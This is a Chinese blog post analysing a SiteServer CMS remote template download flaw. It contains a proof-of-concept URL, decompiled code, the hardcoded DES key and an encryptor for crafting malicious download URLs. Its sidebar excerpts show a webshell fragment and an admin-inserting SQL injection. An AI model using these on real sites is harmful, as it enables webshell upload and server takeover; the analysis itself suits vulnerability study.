学习笔记-.net安全之SiteServer远程下载分析

最新推荐文章于 2024-04-27 21:22:05 发布
最新推荐文章于 2024-04-27 21:22:05 发布
阅读量464 收藏 1
点赞数
文章标签: 学习 .net 安全 c# ui
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_35360663/article/details/127729792
版权

0x00 简介

在N年前有个siteserver的远程getshell,其实这个洞很简单,问题出在下载模板这里。

找个低版本4.5左右的siteserver下载

0x01 漏洞成因

POC

192.168.110.129:8081/siteserver/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=hello&downloadUrl=ZjYIub0slash0YxA1HKHKT0add0CAWlTomu1H0add0qeh9upSVU73ZzMc0equals0&directoryName=hello

问题文件出在Ajax/ajaxOtherService.aspx我们可以看到参数SiteTemplateDownload,顾名思义 站点模板下载,比较明显的后台管理方面的漏洞。

找到对应文件,进行反编译看看源码。

code 0x00

public void Page_Load(object sender, EventArgs e)
{
    string a = base.Request["type"];
    NameValueCollection attributes = new NameValueCollection();
    string text = null;
    RequestBody body = new RequestBody();
    if (a == "GetCountArray")
    {
        string userKeyPrefix = base.Request["userKeyPrefix"];
        attributes = this.GetCountArray(userKeyPrefix);
    }
    else if (a == "SiteTemplateDownload")
    {
        string userKeyPrefix2 = base.Request["userKeyPrefix"];
        string downloadUrl = TranslateUtils.DecryptStringBySecretKey(base.Request["downloadUrl"]);
        string directoryName = base.Request["directoryName"];
        attributes = this.SiteTemplateDownload(downloadUrl, directoryName, userKeyPrefix2);
    }
...

提出无关代码,当传入的typeSiteTemplateDownload的时候用DecryptStringBySecretKey函数对downloadurl进行了解密,跟进这个函数。

>code 0x01

public static string DecryptStringBySecretKey(string inputString)
{
    if (string.IsNullOrEmpty(inputString))
    {
        return string.Empty;
    }
    inputString = inputString.Replace("0add0", "+").Replace("0equals0", "=").Replace("0and0", "&").Replace("0question0", "?").Replace("0quote0", "'").Replace("0slash0", "/");
    DESEncryptor desencryptor = new DESEncryptor();
    desencryptor.InputString = inputString;
    desencryptor.DecryptKey = FileConfigManager.Instance.SecretKey;
    desencryptor.DesDecrypt();
    return desencryptor.OutString;
}

对传入的值进行简单替换,然后调用DesDecrypt进行解密,跟进此函数。

code 0x02

public void DesDecrypt()
{
    byte[] rgbIV = new byte[]
    {
        18,
        52,
        86,
        120,
        144,
        171,
        205,
        239
    };
    byte[] array = new byte[this.inputString.Length];
    try
    {
        byte[] bytes = Encoding.UTF8.GetBytes(this.decryptKey.Substring(0, 8));
        DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();
        array = Convert.FromBase64String(this.inputString);
        MemoryStream memoryStream = new MemoryStream();
        CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Write);
        cryptoStream.Write(array, 0, array.Length);
        cryptoStream.FlushFinalBlock();
        Encoding encoding = new UTF8Encoding();
        this.outString = encoding.GetString(memoryStream.ToArray());
    }
    catch (Exception ex)
    {
        this.noteMessage = ex.Message;
    }
}

可以看到是个DES加密。 其中密匙DecryptKey在上一块代码区指向FileConfigManager.Instance.SecretKey

KEY:

public string SecretKey { get; } = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5";

知道密匙和加密方法,很简单就能写出加密解密方法,直接可以直接扣他的代码这里直接写加密方式。

DesEncrypt:

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;

namespace siteserver
{
    class Program
    {

        static void Main(string[] args)
        {
            DesEncrypt("www.baidu.com/1.zip");
        }
        static public void DesEncrypt(string inputString)
        {
            string encryptKey = "vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5";
            byte[] rgbIV = new byte[]
            {
                18,
                52,
                86,
                120,
                144,
                171,
                205,
                239
            };
            try
            {
                byte[] bytes = Encoding.UTF8.GetBytes((encryptKey.Length > 8) ? encryptKey.Substring(0, 8) : encryptKey);
                DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();
                byte[] bytes2 = Encoding.UTF8.GetBytes(inputString);
                MemoryStream memoryStream = new MemoryStream();
                CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateEncryptor(bytes, rgbIV), CryptoStreamMode.Write);
                cryptoStream.Write(bytes2, 0, bytes2.Length);
                cryptoStream.FlushFinalBlock();
                Console.WriteLine(Convert.ToBase64String(memoryStream.ToArray()).Replace("+", "0add0").Replace("=", "0equals0").Replace("&", "0and0").Replace("?", "0question0").Replace("'", "0quote0").Replace("/", "0slash0"));
            }
            catch (Exception ex)
            {
            }
        }

    }
}

在POC中还有参数userKeyPrefixdirectoryNamecode 0x00中看到参数传入SiteTemplateDownload函数,继续跟进。

public NameValueCollection SiteTemplateDownload(string downloadUrl, string directoryName, string userKeyPrefix)
{
    string key = userKeyPrefix + "_TotalCount";
    string key2 = userKeyPrefix + "_CurrentCount";
    string key3 = userKeyPrefix + "_Message";
    CacheUtils.Max(key, "5");
    CacheUtils.Max(key2, "0");
    CacheUtils.Max(key3, string.Empty);
    NameValueCollection progressTaskNameValueCollection;
    try
    {
        CacheUtils.Max(key2, "1");
        CacheUtils.Max(key3, "开始下载模板压缩包,可能需要10到30分钟,请耐心等待");
        string siteTemplatesPath = PathUtility.GetSiteTemplatesPath(directoryName + ".zip");
        FileUtils.DeleteFileIfExists(siteTemplatesPath);
        WebClientUtils.SaveRemoteFileToLocal(downloadUrl, siteTemplatesPath);
        CacheUtils.Max(key2, "4");
        CacheUtils.Max(key3, "模板压缩包下载成功,开始解压缩");
        string siteTemplatesPath2 = PathUtility.GetSiteTemplatesPath(directoryName);
        if (!DirectoryUtils.IsDirectoryExists(siteTemplatesPath2))
        {
            ZipUtils.UnpackFiles(siteTemplatesPath, siteTemplatesPath2);
        }
        CacheUtils.Max(key2, "5");
        CacheUtils.Max(key3, string.Empty);
        progressTaskNameValueCollection = AjaxManager.GetProgressTaskNameValueCollection("站点模板下载成功,请到站点模板管理中查看。", string.Empty);
    }
    catch (Exception ex)
    {
        progressTaskNameValueCollection = AjaxManager.GetProgressTaskNameValueCollection(string.Empty, string.Format("<br />下载失败!<br />{0}", ex.Message));
    }
    CacheUtils.Remove(key);
    CacheUtils.Remove(key2);
    CacheUtils.Remove(key3);
    return progressTaskNameValueCollection;
}

userKeyPrefix 基本不用管,directoryName为下载到本地的zip名,下载后zip自动解压,所以漏洞就形成了。

0x02 漏洞复现

0x03 总结

存在这个漏洞的首要原因是Ajax/ajaxOtherService.aspx文件没有限制权限,任何人都可以访问,在后台中,模板下载上传,往往是GETSHELL的关键点。

点击关注,共同学习!安全狗的自我修养

github haidragon

https://github.com/haidragon

C-haidragon
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
siteserver远程模板下载Getshell漏洞
Jiajiajiang_的博客
03-28 4198
此处不做分析,只做漏洞的复现。 参考:https://www.freebuf.com/articles/web/195105.html 准备工作: 需要一台公网服务器,一个有漏洞的站点(肯定的对8)。 第一步 先写一个马,此处是aspx站点,自然是aspx的马,但因为会有拦截等,所以构造如下的马。 <%@ Page Language="Jscript" Debug=true%&...
siteservercms 缺点_Siteserver CMS 远程模板下载Getshell漏洞
weixin_39576149的博客
01-30 1193
SiteServerCMS-Remote-download-Getshell-vulnerabilitySiteServerCMS 远程模板下载Getshell漏洞avatar漏洞缺陷是由于后台模板下载位置未对用户权限进行校验,且 ajaxOtherService中的downloadUrl参数可控,导致getshell,目前经过测试发现对5.0版本包含5.0以下通杀.先调用了DecryptStri...
ASP.NET源码——[CMS程序]SiteServer CMS v2.6.0 SQL版.zip
10-08
ASP.NET源码——[CMS程序]SiteServer CMS v2.6.0 SQL版_siteservercmssql_new_11.zip
SiteServer XSS 后台绕过登陆 遍历文件漏洞
收集盒 Book box
05-16 1852
首先注入 这个比较关键 用户登录后会产生3个COOKIE 一个是SESSIONID 一个是 AUTH (这个是啥,随便改就可以的) 一个是记录用户名的 问题就出在这里了,大部分的功能都是设计到用户名而且都是从COOKIE里查看的 所以注入就产生了 在 用户名上 登录后 修改COOKIE 刷新下 注入出现了 没有过滤COOKIE的值 导致注入 论坛XSS 由于以上漏洞
SiteServer CMS 0Day
p656456564545的专栏
01-09 2764
经测试秒杀最新的3.5版   EXP: 直接访问UserCenter/login.aspx 用户名处输入: 123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypte
android 访问服务器sql_一次服务器被传webshell事件溯源
weixin_39614675的博客
11-02 97
文章来源:网友投稿文章作者:XD0ne背景web服务器使用SiteServer开源CMS为建站模板,该类cms属于漏洞高发区,频频会爆出高危漏洞。这次的应该是个在野0day。起因阿里云安骑士告警溯源过程可以看到阿里云安骑士报了存在服务器存在webshell,访问该链接,显示403,应该是触发了上传目录下可读可写不可执行的安全策略。我们取得了相关服务器的权限之后,在主机上进行漏洞影响范围和...
SiteServer 3.4.4 逻辑漏洞导致SQL注入及修复方法
收集盒 Book box
11-18 1185
今天特别发现SiteServe CMS( 3.4.4 )网站根目录多了一个asp文件,我就意识网站可以被挂马了!马上排查,终于在后台发现多了一个blue用户名的超级管理员。我猜想可能是SiteServe CMS系统有漏洞,上网一查,果然把到一堆“SiteServer 3.4.4 逻辑漏洞导致SQL注入”的文章。 ----------------------------------------
SiteServer CMS 新版本 V6.15(2020年6月1日发布)
dotNET跨平台
06-02 877
欢迎来到 SiteServer CMS V6.15版本,新版本重点增加了 REST API 的接口调用,同时修复了多项BUG:REST API 接口增强:通过REST API,第三方系统...
内网渗透思路学习——靶场实战——暗月项目七
qq_45612828的博客
08-17 5712
内网渗透思路学习——靶场实战——暗月项目七。学习一下内网渗透中的一些攻击思路和技巧(比如常见的横向、纵向渗透、代理穿透、提权、免杀等等)
SiteServer CMS-.net
06-14
SiteServer CMS 是定位于中高端市场的CMS内容管理系统,能够以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异、规模庞大的网站平台。2018年2月1日,SiteServer CMS官方宣布发布全新版本V6.0...
SiteServer CMS 3.6.4 破解
01-02
SiteServer CMS 3.6.4版本,爆破,将BaiRong.Core.dll文件直接替换到bin目录即可,CMS测试通过,其他未测试,理论上都没有问题。仅用于测试,不可用于商业用途。
SiteServer cms授权破解工具&eWebEditor;破解教程
05-03
IIS中安装部署完后运行Default.aspx,点击生成 ,在根目录下会生成个license.lic 文件,覆盖原有授权文件即可。(注:生成授权文件前需要配置license.xml)
SiteServer CMS 3.6 破解
03-11
将BaiRong.Core.dll文件直接替换到bin目录即可,CMS测试通过,其他未测试,理论上都没有问题。
SiteServer CMS 5.0 安装包
02-05
官方提供的最新版本是SiteServer5.0安装包。本文是以全新安装SiteServer为例,所以需要下载安装包,注意不是升级包。 需要的小伙快来CSDN下载吧!
SiteServer v3.4.4 for .net1.1.rar
07-08
SiteServer CMS 是基于微软.NET 平台开发的网站内容管理系统,它集成了内容发布管理、多站点管理、定时内容采集、定时生成、多服务器发布、搜索引擎优化、流量统计等多项强大功能,独创的 STL 模板语言,通过...
ASP.NET源码——[CMS程序]SiteServer CMS 3.3.7 SQL版.zip
10-08
ASP.NET源码——[CMS程序]SiteServer CMS 3.3.7 SQL版_siteservercmssql_new_10.zip
党务学习|基于SprinBoot+vue的大学生党务学习平台(源码+数据库+文档)
伟庭的博客
04-27 706
大学生党务学习平台管理系统按照操作主体分为管理员和用户。用户的功能等。该系统采用了Mysql数据库,Java语言,Spring Boot框架等技术进行编程实现。大学生党务学习平台管理系统可以提高大学生党务学习平台信息管理问题的解决效率,优化大学生党务学习平台信息处理流程,保证大学生党务学习平台信息数据的安全,它是一个非常可靠,非常安全的应用程序。大学生党务学习平台管理系统;入党申请,党课Mysql数据库;Java语言。
集成学习算法学习笔记
m0_46521579的博客
04-27 412
三个臭皮匠顶一个诸葛亮集成学习会考虑多个评估器的建模结果,汇总后得到一个综合的结果,以此来获取比单个模型更好的回归或分类表现。很多独立的机器学习算法:决策树、神经网络、支持向量机集成学习构建了一组基学习器,并将它们综合起来作为最终的模型。在很多集成学习模型中,对基学习器的要求很低。集成学习适用于机器学习的几乎所有领域:回归、分类、推荐和排序。相同的多个基学习器不会带来任何提升,不同的模型取长补短,每个基学习器都会犯不同的错误,综合起来犯错的可能性不大。
PySide6 GUI 学习笔记——使用资源文件
最新发布
Humbunklung的专栏
04-27 535
在界面开发中,我们常常将一些图片、图标等资源统一存放到资源文件中供使用,从而让图形界面表达能力更好,更加丰富,譬如带图标的按钮、菜单、窗口等等。PySide6可以将多个图标、图片等资源文件编译到.py文件中,这样可以被我们的程序直接调用,使得资源的管理更加方便。
siteserver cms v6
09-17
SiteServer CMS V6是一款功能强大的内容管理系统。它是基于.NET技术开发的,具有开源、高效、安全等优点。 SiteServer CMS V6提供了丰富的功能和灵活的模块化架构,可以满足不同网站的需求。它支持多种内容类型,包括文章、图片、视频等。同时,它还提供了强大的用户管理功能,可以灵活地设置用户权限,管理用户信息。此外,SiteServer CMS V6还支持多语言和多站点管理,方便用户进行多语言的网站建设和管理。 SiteServer CMS V6还具有高性能和高可扩展性。它采用了缓存技术和分布式部署,可以有效地提升网站的访问速度和并发性能。而且,SiteServer CMS V6还支持插件扩展和自定义开发,用户可以根据自己的需求添加功能或进行定制开发。 此外,SiteServer CMS V6还注重安全性。它提供了多种安全策略,包括用户权限管理、数据访问控制等。同时,SiteServer CMS V6还具备高度的防护能力,可以抵御常见的网络攻击,保障网站的安全。 综上所述,SiteServer CMS V6具有丰富的功能、卓越的性能和高度的安全性,是建设和管理网站的理想选择。无论是个人博客、企业官网还是电子商务平台,SiteServer CMS V6都能够提供强大的支持,并为用户提供优秀的网站体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C-haidragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值